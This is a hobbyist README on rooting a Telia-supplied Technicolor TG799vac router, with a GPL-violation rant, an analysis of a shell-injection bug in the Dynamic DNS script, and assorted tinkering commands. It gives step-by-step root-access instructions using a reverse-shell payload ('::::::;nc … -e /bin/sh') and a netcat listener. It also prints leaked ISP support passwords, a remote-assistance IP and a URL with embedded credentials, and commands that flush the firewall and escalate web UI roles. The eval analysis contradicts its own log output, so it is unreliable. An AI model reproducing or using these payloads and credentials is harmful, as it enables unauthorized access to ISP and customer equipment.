TG799VAC XTREME 17.2 MINT Save Abandoned
My personal unique wiki for hacking the router firmware used by (Telia)TG799vac Xtream v17.2-MINT delivered from Technicolor
# TG799VAC-XTREME-17.2-MINT
Autism in all its glory, greetings to our friend you you have all my respect of course, keep up the good work mate: @weaponizedautism
The first thing I want to do in this README is to sending a a message directly to Cygate,TeliaCompany AB and Technicolor
This README was created because you blacklsited me AND because the Violations of the GNU Licenses for both technicolor, motorola and sagemcom devices you did. I asked several times without get access to the source code from all of you, you didn't even reply and your support just ignored me and said "I will pass this message on, we will get back to you as soon as we can" for 5 years now, without any reply, lol.
When you release your software under the GPL, it means you give anyone a license to use your software under some terms and agreements.
If somebody violates the agreement, you are in breach of contract with you. This means I can sue them in a court of law. Please read more about GPL Violation and respect all developers who have made this possible for you to deliver, whoever breaks behaves like this has of course no right to be left alone, therefore blame yourselves, idiots.
It´s not the first time, this README was created 5 years ago and these companies STILL violates the GPL, for example i found this from January, 2022.
Technicolor provides modem-router to several ISP around the world, they all have a good
hardware and the firmware homeware that is based on OpenWrt and for this they
have to provide their GPL Source Code.
In the Technicolor website there is an apposite section to request the GPL Source code
and it can be reached at this page, and where they offer to send their Open Source Code
to everyone get in touch with them writing at the address [email protected].
Everything seems so simple but unfortunatley it isn't because Technicolor doesn't always answer
at GPL Source Code requests, and several people reported this in the OpenWrt Forum in this thread.
Personally I have two bad experiences with them.
In the March 2020 I wrote to Technicolor for asking the Homeware 18 GPL Source Code for
a device, but after several months without answer in the May 2020 I wrote at [email protected]
to report what was happening and at the end Technicolor provided me the requested GPL Source Code in the June 2020.
I don't know if Tecnicolor has sent me the GPL Source Code cause I wrote at Software Freedom Conservancy or not.
In the September 2021 I wrote to Technicolor for asking the Homeware 19 GPL Source Code for another device,
cause no answer in the October 2021 I wrote to [email protected] to report the situation and at the present
day I still have not received neither the GPL Source Code nor any answer. I'll continue write an email to `Tecnicolor`
every week, I have the rights to receive the GPL Source Code.
Source for above message: Technicolor violates OpenWrt GPL License
More info and some people that doiing a really great job can be found in this thread.: Technicolor GPL Source Code Request
Important Update (2018 Exploit) - Written 2023-08-05:
Five years have passed since the 2018 Exploit in our router system, and throughout this period, I have diligently searched for a comprehensive explanation concerning the exact cause of the exploit. Regrettably, all available information seems to be riddled with speculations and lacks a definitive account. In an effort to bring closure to this matter, I have decided to take matters into my own hands and provide a detailed account of the incident.
I am providing an important update regarding the 2018 Exploit that occurred five years ago. Today, on August 5, 2023, I am finally able to address this issue and provide the detailed explanation that was missing at the time.
Back in 2018, an exploit was discovered in our ISP's router system, and due to unforeseen circumstances and time constraints, I was unable to offer a comprehensive explanation for the incident. However, I have now taken the time to thoroughly review our records and want to share the missing details with you.
Better late than never, right? I apologize for the delay, but I want to ensure that everyone is well-informed about what happened and the measures I took to resolve the situation.
It is crucial to highlight that the root cause of the exploit does not revolve around IP addresses' inadequate sanitization, as some sources suggest. Instead, I firmly argue that the primary issue lies in the improper use of shell scripting, particularly the highly dangerous eval function. Utilizing eval without caution poses significant security risks, and it is imperative to exercise extreme care when deploying it in any context.
Through this updated disclosure, I aim to shed light on the true cause behind the exploit and foster a better understanding of the risks involved with certain scripting practices. Today, while exploring another kind of exploit, I was reminded of this repository created 5 years ago. Coincidentally, I received specific questions about shell injection from various students, and the significance of this issue resurfaced in my mind. This prompted me to conduct further investigations and provide a comprehensive explanation for the exploit that occurred in this router system back in 2018.
Therefore, I'm taking this opportunity to complete the README with the missing details, so everyone is aware of what happened and what actions were taken to address the situation.
Shell Injection Vulnerability in Dynamic DNS Script - A Detailed Analysis
It has been some time since my initial investigation, and I have struggled to find any comprehensive explanations regarding the reason behind the possibility of injecting shell code in the Dynamic DNS script used by Technicolor routers. While some sources suggest it might be due to inadequate sanitization of IP addresses, I argue that the root cause lies in the improper use of shell scripting, particularly the highly dangerous eval function. There's a compelling reason why eval should be handled with extreme caution and, if used, thoroughly tested in every context.
In this report, I aim to shed light on the vulnerability by providing a detailed analysis of the code, pinpointing the specific flaw, and discussing the potential risks and impact. The primary focus will be on the misguided use of eval and the implications it has on system security.
As with the previous case involving the 'ping' version, this incident serves as yet another cautionary tale highlighting the dangers of improper coding practices and the potential consequences of relying on eval for executing dynamic code. A fundamental understanding of the risks associated with eval and rigorous data validation practices are critical to ensure the robustness and security of any script.
The following is the detailed report of the vulnerability, including the code snippet where the flaw resides, as well as my thorough analysis and recommended mitigation strategies.
Shell Injection Vulnerability in Dynamic DNS Script - Part 1
I discovered a potential security vulnerability in the Dynamic DNS script (dynamic_dns_updated.sh) used by Technicolor routers. The vulnerability arises from the improper use of eval, which can lead to Shell Injection and potentially allow an attacker to execute arbitrary commands on the system.
Background
The Dynamic DNS script is designed to update the DNS records for the router, allowing it to be accessed via a domain name rather than a dynamic IP address. However, in the script, eval is used to evaluate a string that contains user-provided or dynamically generated data. This can lead to unexpected command execution if the input is not properly sanitized.
Vulnerable Code
The vulnerable part of the code can be found in /usr/lib/ddns/dynamic_dns_functions.sh and is invoked from dynamic_dns_updated.sh. Specifically, the problematic code snippet is as follows:
__RUNPROG="$NSLOOKUP $lookup_host $dns_server >$DATFILE 2>$ERRFILE"
while : ; do
write_log 7 "#> $__RUNPROG"
eval $__RUNPROG
__ERR=$?
# ... continuation of the code ...
done
Analysis
-
The script constructs the command to be executed in the
__RUNPROGvariable, which includes output redirection (>) and error redirection (2>). -
The script then uses
evalto execute the command stored in__RUNPROG. Sinceevalevaluates the entire string, including the redirection instructions, it can lead to the execution of unintended commands. -
An attacker as you all know could potentially manipulate the input values (
$lookup_hostor$dns_server) to include malicious commands or modify the redirection instructions. This can result in arbitrary code execution on the system and so it did.
Mitigation
To mitigate the Shell Injection vulnerability, it is essential to properly validate and sanitize all user-provided or dynamically generated data before using it in eval or any other commands. Avoid using eval whenever possible, as it introduces complexity and increases the risk of security flaws.
Conclusion
The improper use of eval in the Dynamic DNS script can lead to a Shell Injection vulnerability, potentially exposing the system to unauthorized access and arbitrary code execution. By carefully validating and sanitizing input data and avoiding the use of eval
Detailed Analysis of the Vulnerable Code - Part 2
In the context of the Dynamic DNS script, the following code snippet is found:
+ eval /usr/bin/nslookup ::::::;nc 192.168.1.96 1337 -e /bin/sh >/var/run/ddns/myddns_ipv4.dat 2>/var/run/ddns/myddns_ipv4.err
+ /usr/bin/nslookup ::::::
nslookup: can't resolve '::::::': Name or service not known
+ nc 192.168.1.96 1337 -e /bin/sh
+ __ERR=1
The sequence of events begins with the use of eval, which evaluates the entire string that follows. The first part of the string is the nslookup command, attempting to resolve the invalid domain name "::::::". As expected, nslookup fails with the error message "nslookup: can't resolve '::::::': Name or service not known."
After the failed nslookup, the script proceeds to the next part of the evaluated string, which is the nc (netcat) command. The nc command attempts to connect to IP address 192.168.1.96 on port 1337 and execute a shell (/bin/sh) over the connection.
However, due to the failure of the nslookup command, the nc command does not execute. This is evident from the log, where nc is not triggered and the error variable __ERR is assigned the value 1.
The critical concern here is the use of eval, which merges multiple commands into a single command line. As a result, the nc command, which poses a significant security risk, is chained together with the failed nslookup command.
Potential Consequences Without `eval
IMPORTANT: Without eval, the nslookup and nc commands would be executed independently. If eval were not used, the sequence would look like this:
/usr/bin/nslookup ::::::
nslookup: can't resolve '::::::': Name or service not known
The failed nslookup command would return the error message as before, but the nc command would not run. This is because the nc command is not directly related to the nslookup command; hence, there is no attempt to execute it after the nslookup failure.
As a result, without eval, the potential security risk of chaining nc with nslookup is avoided.
Conclusion
The presence of eval in the script leads to the dangerous combination of commands, which in turn creates a Shell Injection vulnerability.
Avoiding the use of eval and implementing robust data validation practices are critical steps in securing the script and preventing vulnerabilities like Shell Injection.
Repository's Purpose and Explanation
This repository exists as an essential historical record and learning resource. It aims to provide insights into the 2018 Exploit that affected our ISP's router system. While the exploit has been fixed and no longer poses a threat in current firmware versions, it may still be relevant for educational purposes or for those who wish to explore past vulnerabilities.
Warning Never forget and please remember that attempting this exploit on any active or unauthorized network is strictly prohibited and may have legal consequences. The information presented here is solely intended for educational and research purposes, and wuseman can never be held responsible for other use cases. Remember that!
- Everything below this line is from the readme that was created back in the days and the 2023 discloure ends here.
These are pictures I took over a 5 year period and I've probably had over 20 different devices and I've tried everything and then some during these years with these routers. it's been fun but I've now chosen to acrivate this repon.
VBNT-H
2015-2022 - The End
Bonus
This is unique and I'm not going to share how I got hold of these, but at least this is the login credentials in plain text for these devices that are used in case of "support" in case the ssh key doesn't work.
TeliaCompany AB - User-Agents:
IpTV............: KreaTVWebKit/600 (Motorola STB; Linux; 5305)
Server..........: Apache-Coyote/1.1
Cisco Switch....: Wget
WEB.............:
Default password for TeliaCompany AB employees
Old Password....: _T3L1a!SuPPor7
New Password:...: SUPP0r7!W1f1R0uT3r
Remote IP.......: 131.116.22.242
Remote IP.......: uci show mwan.remoteassist.dest_ip
Default Shell Password on TG799Vac devices from TeliaCompany AB
Login...........: root
Password........: root
WebUi Assistance Password
Login...........: assistance (uci get web.remote)
Password........: random ()
Port............: 60443 (uci get web.remote.port)
Interface.......: mgmt (uci get web.remote.interface)
Enable..........: uci set web.remote.active=1
Disable.........: uci set web.remote.active=0
Ngwfdd credentials
Login...........: telia
Password........: ZDgFbBH5jQvUocL7
Remote IP.......: .
Remote DNS......: telia-gw.tgwfd.org
Remote Port.....: 8443
Via Shell.......: uci get ngwfdd.config.base_url
Full URL........: https://telia:[email protected]:8443/
Other repositorys similiar to this one I have been working on during the years
Cisco...........: https://cisco.nr1.nu/
Sagemcom........: https://sagemcom.nr1.nu/
Technicolor0....: https://technicolor.nr1.nu/
Technicolor1....: https://github.com/wuseman/TG799vnv2-10.5.1.Q-SMART-3.6.1
Technicolor2....: https://github.com/wuseman/TG799VAC-XTREAM-V16.2-JADE
Technicolor4....: https://github.com/wuseman/TG799VAC-XTREME-17.2-MINT
First of all I want to warn you straight away so you know what not to do if
you don't know exactly what you are doing, you always want to use
bank_1 as active bank and never bank_2, you have been warned
VALID
echo "bank_2" > /proc/bankversion/active
DANGEROUS
echo "bank_2" > /proc/bankversion/active
Boards
TeliaCompany AB - Board: VANT-W
TeliaCompany AB - Board: VANT-R
- Download URLS:
TeliaCompany AB - Board: VBNT-H
TeliaCompany AB - Board: VDNT-O
SSH and Dropbear access
- SHORT VERSION
- Please wait 20-30 seconds before you trying to ssh into your router
- Connect to router: 'ssh [email protected]'
- Default password: root
- You now got shell access with full root access.
- Copy and paste all this stuff in dyndns field in webgui (edit ip):
::::::;nc 192.168.1.144 1337 -e /bin/sh
/ LONG VERSION:
- Let's begin. Fire up a terminal of any kind and just run the awesome netcat tool and listen on a port:
nc -lvvp 1337
- Go to the WAN Services and press SHOW ADVANCED. In username, password and domain field you need type the below command, after this is done just enable the dyndns. It wont matter wich hoster you choose just pick one, press save and just wait 4-5 seconds and you have just got full root access of your TG799VAC Xtreme 17.2 Mint, check preview video above if you do not understand
:::::::;nc [machine_IP] 1337 -e /bin/sh
- You will see something similiar and if you see this then you got root access, type ls / for example:
listening on [any] 1337 ...
connect to [192.168.1.144] from router [192.168.1.1] 40980
OpenWRT Package Manager
- Below commands will give you a working opkg setup, copy and paste:
rm /etc/opkg/distfeeds.conf
cat << "EOF" > /etc/opkg/customfeeds.conf
src/gz chaos_calmer_base http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/base
src/gz chaos_calmer_packages http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/packages
src/gz chaos_calmer_luci http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/luci
src/gz chaos_calmer_routing http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/routing
src/gz chaos_calmer_telephony http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/telephony
src/gz chaos_calmer_management http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/management
EOF
cat << "EOF" > /etc/opkg.conf
arch all 1
arch all 100
arch noarch 1
arch brcm63xx 3
arch brcm63xx-tch 10
arch brcm63xx 200
arch brcm63xx-tch 300
dest root /
dest ram /tmp
lists_dir ext /var/opkg-lists
option overlay_root /overlay
EOF
- Update repositorys and install sftp-server
opkg update
opkg install openssh-sftp-server
ash -c /usr/libexec/sftp-server
#opkg list-upgradable|cut -d' ' -f1|xargs opkg upgrade
Configure Dropbear so we get shell access via Openssh
-
Hardensecurity by disabling password authentication.
### Dropbear MGMT Configuration (backdoor, enable it if you need support otherwise leave it off)
uci set dropbear.mgmt.enable=0
uci set dropbear.mgmt.PasswordAuth=off
uci set dropbear.mgmt.RootPasswordAuth=off
uci set dropbear.mgmt.Port=22
uci set dropbear.mgmt.Interface=mgmt
uci set dropbear.mgmt.AllowedClientIPs=131.116.22.242/32
### Dropbear WAN Configuration
uci set dropbear.wan.enable=0
uci set dropbear.wan.PasswordAuth=off
uci set dropbear.wan.RootPasswordAuth=off
uci set dropbear.wan.Interface=wan
uci set dropbear.lan.IdleTimeout=3600
uci set dropbear.lan.SSHKeepAlive=0
uci set dropbear.lan.enable=1
uci set dropbear.lan.Port=22
uci set dropbear.lan.BannerFile=/etc/banner
uci set dropbear.lan.RootLogin=1
uci set dropbear.lan.GatewayPorts=
uci set dropbear.lan.rsakeyfile=
uci set dropbear.lan.mdns=0
uci set dropbear.lan.MaxAuthTries=2
uci set dropbear.wan.AllowedClientIPs=131.116.22.242/32
### Dropbear LAN Configuration
uci set dropbear.lan.enable=1
uci set dropbear.lan.PasswordAuth=on
uci set dropbear.lan.RootPasswordAuth=on
uci set dropbear.lan.Interface=lan
uci set dropbear.lan.IdleTimeout=3600
uci set dropbear.lan.SSHKeepAlive=0
uci set dropbear.lan.Port=22
uci set dropbear.lan.BannerFile=
uci set dropbear.lan.RootLogin=1
uci set dropbear.lan.GatewayPorts=
uci set dropbear.lan.rsakeyfile=
uci set dropbear.lan.mdns=0
uci set dropbear.lan.MaxAuthTries=2
- Setup proper permissions for
Dropbearpath:
chmod -R u=rwX,go= /etc/dropbear
- Apply changes and restart dropbear
uci commit
/etc/init.d/dropbear restart
- Add your ssh key:
ssh [email protected] "tee -a /etc/dropbear/authorized_keys"
\ < ~/.ssh/id_rsa.pub
WebUI
There is many settings in the .lp files in the web directory
that deny 'admin' from edit settings, see below example and how its
possible to get access too all settings as admin without
changing role
Example:
Inside /www/docroot/cards/snippets/002_broadband_xdsl.lp:
if session:getrole() == "superuser" or session:getrole() == "telia" then
- Dry Run Retrieve All Relevant Settings (For Your Reference):
find /www -type f -exec sed -n '
/can\(Add\|Apply\|Edit\|Remove\|Delete\) = / s/false/true/p
' {} +
- Apply the settings
find /www -type f -exec sed -i '
/can\(Add\|Apply\|Edit\|Remove\|Delete\) = / s/false/true/
' {} +
- Run below for get access to all settings:
find /www -type f -exec sed -i 's/"telia"/"admin"/g' {} \;
find /www -type f -exec sed -i 's/"superuser"/"admin"/g' {} \;
find /www -type f -exec sed -i 's/"engineer"/"admin"/g' {} \;
- Copy and paste below to get full access on webUI and all the cards that exist:
for missed_roles in $(uci show|grep \.roles|grep -v admin|cut -d'=' -f1|sed 's/$/=admin/g'); do
uci add_list ${missed_roles};
done
- It is required to restart nginx:
/etc/init.d/nginx restart
- Enjoy! You are now superduper admin on your own router.
Session and Tokens
- Get CSFR token via cli:
curl -sL http://192.168.1.1/login.lp?action=getcsrf
- Get CSFR token via your browsers developer console:
/*Open prefered browser
Press F12
Go to Console tab
Paste below*/
$("meta[name=CSRFtoken]").attr("content")
Tokens/Sessions/Auth/Login
Advanced settings about how we cunderstand the auth processes and more about interesting stuff for WebUI
For understand how token/sesssions/proxy stuff on router when login via WebUI a good thing is to read the comments onc are some examples with comments you can use to understand how this is handled when you get root access, you often get a pretty good overview of things then.
This is what we should have access to, so it will be bonus after bonus!
This is the greatest pleasure of hacking different kinds of devices in my opintion, see how the "best"(they probably think so) are writing things to get better knowledge how to hack things in future, they really work hard so that we don't get full access to our devices, noobs.
-- Change SRP parameters and crypted password of the current user of this session.
-- @param salt A newly generated SRP salt for the updated password
-- @param verifier A newly calculated SRP verifier for the generated salt and updated password
-- @param cryptedpassword A newly calculated crypted password. This parameter is optional,
-- set to nil if CLI password update is to be omitted
-- @return true or nil, error message
local proxy = {
getusername = getusername,
isdefaultuser = isdefaultuser,
toggleDefaultUser = toggleDefaultUser,
getrole = getrole,
store = store,
retrieve = retrieve,
logout = logout,
hasAccess = hasAccess,
getCSRFtoken = getCSRFtoken,
checkCSRFtoken = checkCSRFtoken,
addUserToManager = addUserToManager,
delUserFromManager = delUserFromManager,
reloadAllUsers = reloadAllUsers,
changePassword = changePassword,
getUserCount = getUserCount
}
__metatable = "ah ah ah, you didn't say the magic word"
- Session/SessionManager
/usr/lib/lua/web/session.lua
/usr/lib/lua/web/ssessioncontrol.lua
/usr/lib/lua/web/ssessionmgr.lua
- Sockets are stored in
/usr/lib/lua/socketdir
/usr/lib/lua/socket/core.so
/usr/lib/lua/socket/headers.lua
/usr/lib/lua/socket/http.lua
- Session and cookies is geneerated by files in below folder:
local _M = socket.http
_M.TIMEOUT = 60
_M.PORT = 80
_M.USERAGENT = socket._VERSION
-- Reads MIME headers from a connection, unfolding where needed
function _M.open(host, port, create)
h.try(c:settimeout(_M.TIMEOUT))
h.try(c:connect(host, port or _M.PORT))
if not reqt.proxy and not _M.PROXY then
local proxy = reqt.proxy or _M.PROXY
["user-agent"] = _M.USERAGENT,
port = _M.PORT,
local h = _M.open(nreqt.host, nreqt.port, nreqt.create)
_M.request = socket.protect(function(reqt, body)
return _M
c
There are quite limited tools on the device so if you want to add your own user in a very elegant and correct way you can do this
- Add your own user without any extra tools
-
Since chpasswd is available, you can set passwords with one of the below examples, if you will use the default
chpasswdon the device the password wont be encrypted. -
Method 1 (not encrypted - execute this directly on the device)
echo username:passwordYouWantToUse|chpasswd
- Method 2 (des, md5, sha256, sha512)
Since neither perl or openssl is default installed, you can use your own linux pc for encrypting and salting the password for your user
- chpasswd with
-ewill encrypt the password
echo "username:passwordYouWantToUse" | chpasswd -e
or from another pc, this is another example via perl and openssl
perl -e 'print crypt("passwordYouWantToUse", "salt", "sha512"),"\n"'
- Method 3 (md5, sha256, sha512) -
Passing -1 will generate an MD5 password, -5 a SHA256 and -6 SHA512 (SHA512 is of course what I recommend)
openssl passwd -6 -salt xyz passwordYouWantToUse
BootP/TFTP
- Client wise:
Switch device power off (or pull the power cord).
Connect a client to the device via Ethernet to LAN1, trigger the rescue function by pressing and holding the reset button of the device and then turning the device on (or plug in the power cord).
You can release the reset button after a few seconds.
The device will take ~15-20 seconds to boot a mini-web server, that provides only a single function: it can upload a firmware file and has a button to trigger the flash process.
The web-server will usually be available under either (if in doubt, try both)
Install atftpd on a Gentoo Machine (OpenRC)
emerge --sync
emerge -a atftpd
mkdir /mnt/tftp
cp <firmware.bin> /mnt/tftp/
chown nobody:nogroup -R /mnt/tftp
cat << "EOF" > /etc/conf.d/atftp
TFTPD_ROOT="/mnt/tftp"
TFTPD_OPTS="--daemon --user nobody --group nobody"
/etc/init.d/atftpd start
EOF
-
Thats it, now use getent to confirm it is up and running:
-
Server Wise: (router)
getent services tftp
Server Wise (router)
uci set dhcp.dnsmasq.enable_tftp='1'
- First you need to setup a static ip to be able to communicate with router:
ifconfig eth0 192.168.1.2 netmask 255.255.255.0 up
route add default gw 192.168.1.1
echo "nameserver 192.168.1.1" > /etc/resolv.conf
tcpdump -i enp0s31f6 -vvv -s 0 port bootps
- When tg799 router reporting BOOTP then run below command:
atftp \
--trace \
--option "timeout 1" \
--option "mode octet" \
--put \
--local-file tg799bin.firmware.rbi \
192.168.1.1
Got stuck with some packages that says error opening terminal? No worries - This is caused cause colors - Run below command to fix the xterm problem:
Old Stuff (Various)
- Run uci-whois.sh from scripts dir to whois all ip's that your isp added for various settings:
-- Mount root as read and write:
mount -o remount,rw /
- If you want sort all settings by file, do as below:
mkdir /tmp/uci_sorted;
cd /tmp/uci_sorted;
for uci_settings in "$(uci show | awk -F. '{print $1}' | uniq)"; do
uci show ${uci_settings} > /tmp/uci_sorted/${uci_settings};
done
- List all files where password, pass or/and key is readable in ascii:
find /usr/ -type f -exec grep -Ei "pass|password|key" {} \;
- List all files where password, pass or/and key in all files:
find /usr/ -type f -exec strings -n20 'password' {} \;
- Turning off Power-Saving features
pwrctl config --cpuspeed 0
pwrctl config --wait off
pwrctl config --ethapd off
pwrctl config --eee off
pwrctl config --autogreeen off
- Configure DNS via cli:
cat << "EOF" > /etc/config/ddns
config service 'myddns_ipv4'
option interface 'wan'
option ip_source 'network'
option ip_network 'wan'
option use_https '1'
option cacert 'IGNORE'
option force_interval '36500'
option force_unit 'days'
option enabled '1'
option password 'password'
option username 'domain.com'
option service_name 'loopia.se'
option lookup_host 'domain.com'
option domain 'domain.com'"
EOF
- List all URLs for your firmware that can be downloaded:
This part has its own repository now
strings /etc/cwmpd.db
SQLite format 3
tabletidkvtidkv
CREATE TABLE tidkv ( type TEXT NOT NULL, id TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (type, id, key)))
indexsqlite_autoindex_tidkv_1tidkv
transferPassword5
transfer Username
Stransfer URLhttp://192.168.21.52:7547/ACS-server
5transferaStartTime2018-08-19T15:20:13Z
transfera FaultStringcomplete
transfera FaultCode0M_
M%5transfera CompleteTime2018-08-19T15:19:57Z
'transfera TimeStamp244,9XXXXXX
transfera DelaySeconds3
transfera Password
transfera Username
runtimevarParameterKey#
runtimevarConfigurationVersionD
%_runtimevarBootStrappedhttps://acs.telia.com:7575/ACS-server/ACS-
+/VersionsSoftwareVersion16.2.XXXXXX
transfer FaultString
transfer FaultCode
transfer TimeSt6
transfera UsernameU
transfera URLT7
transfera TimeStampX
transfera SubStatec
transfera Stateb7
transfera StartTimed
transfera PasswordV
- List network devices:
awk '{print $1}' /proc/net/dev
- Disable all firewall rules (until you reboots or relaods)
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t nat -F
iptables -t mangle -F
iptables -F
iptables -X
- Changing max sync speed on your modem:
uci set xdsl.dsl0.maxaggrdatarate='200000' # 16000 default
uci set xdsl.dsl0.maxdsdatarate='140000' # 11000 default
uci set xdsl.dsl0.maxusdatarate='60000' # 40000 default
- Enable or Disable dnsmasq:
uci show dhcp.lan.ignore='1'
- Enable or Disable network time server:
uci set system.ntp.enable_server='1'
- Edit nsplink to something else (where you get redirected when you click on the logo at top)
uci set web.uidefault.nsplink='https://wuseman.nr1.nu'
- This will show all traffic on your router with netstat:
netstat -tulnp
- This will show all ip numbers connected to your router atm..
netstat -lantp \
|grep ESTABLISHED \
|awk '{print $5}' \
|awk -F: '{print $1}' \
|sort -u
- Capture traffic on all interfaces (add -i wl0 for include wifi):
Sniff network traffic on 6rd-6rd interface
ssh root@router tcpdump -i 6rd-6rd -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on atm_iptv interface
ssh root@router tcpdump -i atm_iptv -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on atm_mgmt interface
ssh root@router tcpdump -i atm_mgmt -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on atm_voip interface
ssh root@router tcpdump -i atm_voip -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on atm_wan interface
ssh root@router tcpdump -i atm_wan -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on bcmsw interface
ssh root@router tcpdump -i bcmsw -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on br-hotspot interface
ssh root@router tcpdump -i br-hotspot -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on br-lan interface
ssh root@router tcpdump -i br-lan -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on br-wan interface
ssh root@router tcpdump -i br-wan -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on dsl0 interface
ssh root@router tcpdump -i dsl0 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on eth0 interface
ssh root@router tcpdump -i eth0 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on eth1 interface
ssh root@router tcpdump -i eth1 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on eth2 interface
ssh root@router tcpdump -i eth2 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on eth3 interface
ssh root@router tcpdump -i eth3 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on eth4 interface
ssh root@router tcpdump -i eth4 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on gre0 interface
ssh root@router tcpdump -i gre0 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on gr4t-gre interface
ssh root@router tcpdump -i gre4t-gre -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on ifb9 interface
ssh root@router tcpdump -i ifb0 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on ifb1 interface
ssh root@router tcpdump -i ifb1 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on ip6gre0 interface
ssh root@router tcpdump -i ip6gre0 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on ipt6nl0 interface
ssh root@router tcpdump -i ip6tnl0 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on vlan_sit0 interface
ssh root@router tcpdump -i sit0 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on vlan_eth0 interface
ssh root@router tcpdump -i vlan_eth0 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on vlan_eth1 interface
ssh root@router tcpdump -i vlan_eth1 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on vlan_eth2 interface
ssh root@router tcpdump -i vlan_eth2 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on vlan_eth3 interface
ssh root@router tcpdump -i vlan_eth3 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on vlan_iptv interface
ssh root@router tcpdump -i vlan_iptv -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on vlan_mgmt interface
ssh root@router tcpdump -i vlan_mgmt -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on vlan_voip interface
ssh root@router tcpdump -i vlan_voip -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on wl0 interface
ssh root@router tcpdump -i wl0 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on wl0_1 interface
ssh root@router tcpdump -i wl0_1 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on wl0_2 interface
ssh root@router tcpdump -i wl0_2 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on wl1 interface
ssh root@router tcpdump -i wl1 -U -s0 -w - 'not port 22' |wireshark -k -i -
Sniff network traffic on wl1_1 interface
ssh root@router tcpdump -i wl1_1 -U -s0 -w - 'not port 22' |wireshark -k -i -
- List all IPv4 settings that has been set
uci show \
|grep -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"
- List all interfaces mac addresses:
ifconfig -a \'
|sed '/eth\|wl/!d;s/ Link.*HWaddr//'
- Output
eth0 X0:X0:X0:X0:X0:X0
eth1 X0:X0:X0:X0:X0:X0
eth2 X0:X0:X0:X0:X0:X0
eth3 X0:X0:X0:X0:X0:X0
eth4 X0:X0:X0:X0:X0:X0
eth5 X0:X0:X0:X0:X0:X0
vlan_eth0 X0:X0:X0:X0:X0:X0
vlan_eth1 X0:X0:X0:X0:X0:X0
vlan_eth2 X0:X0:X0:X0:X0:X0
vlan_eth3 X0:X0:X0:X0:X0:X0
vlan_eth5 X0:X0:X0:X0:X0:X0
wl0 X0:X0:X0:X0:X0:X0
wl0_1 X0:X0:X0:X0:X0:X0
wl0_2 X0:X0:X0:X0:X0:X0
Syslog-NG
As default router sending our syslog notices to some server from TeliaCompany AB in Solna, Sweden.
Of course this is nothing I want to do so I send them to my own syslog server, I added some examples for how to getting started on the server side so you can receive the syslogs to your own server instead.
cat << "EOF" > /etc/config/system
config system
option log_filter_ip '192.168.1.208'
option log_port '514'
option hostname 'router'
option zonename 'Europe/Stockholm'
option timezone 'CET-1CEST,M3.5.0,M10.5.0/3'
option network_timezone '1'
option hw_reboot_count '0'
option sw_reboot_count '0'
option cronloglevel '5'
# Filters for /modals/logviewer-modal.lp and what to send to syslog-ng server
list log_filter 'Everything'
list log_filter 'warmboot'
list log_filter 'cwmp'
list log_filter 'cwmpd'
list log_filter 'crond'
list log_filter 'Critical'
list log_filter 'Zonewatcher'
list log_filter 'wifiinfo'
list log_filter 'wifi'
list log_filter 'mmpbxd'
list log_filter 'transformer'
list log_filter 'zoneredird'
list log_filter 'zone_daemon'
list log_filter 'syslog'
list log_filter 'root'
list log_filter 'premiumd'
list log_filter 'lua'
list log_filter 'nginx'
list log_filter 'kernel'
list log_filter 'ipks'
list log_filter 'ipk'
list log_filter 'root'
list log_filter 'user'
list log_filter 'mwan'
list log_filter 'lan'
list log_filter 'vlan'
list log_filter 'opkg'
list log_filter 'hostmanager'
list log_filter 'hostapd'
list log_filter 'fseventd'
list log_filter 'dnsmasq-dhcp'
list log_filter 'dnsmasq'
list log_filter 'ddns-scripts'
list log_filter 'awk'
list log_filter 'assist.remote'
list log_filter 'assist'
list log_filter 'ash'
list log_filter 'bash'
list log_filter 'sh'
list log_filter 'clash'
list log_filter 'user.notice'
list log_filter 'auth'
list log_filter 'pppoe-relay-hotplug'
list log_filter 'odhcpd'
list log_filter 'ipsec_starter'
list log_filter 'ipsec'
list log_filter 'insmod'
list log_filter 'modprobe'
list log_filter 'rmmod'
list log_filter 'vpn'
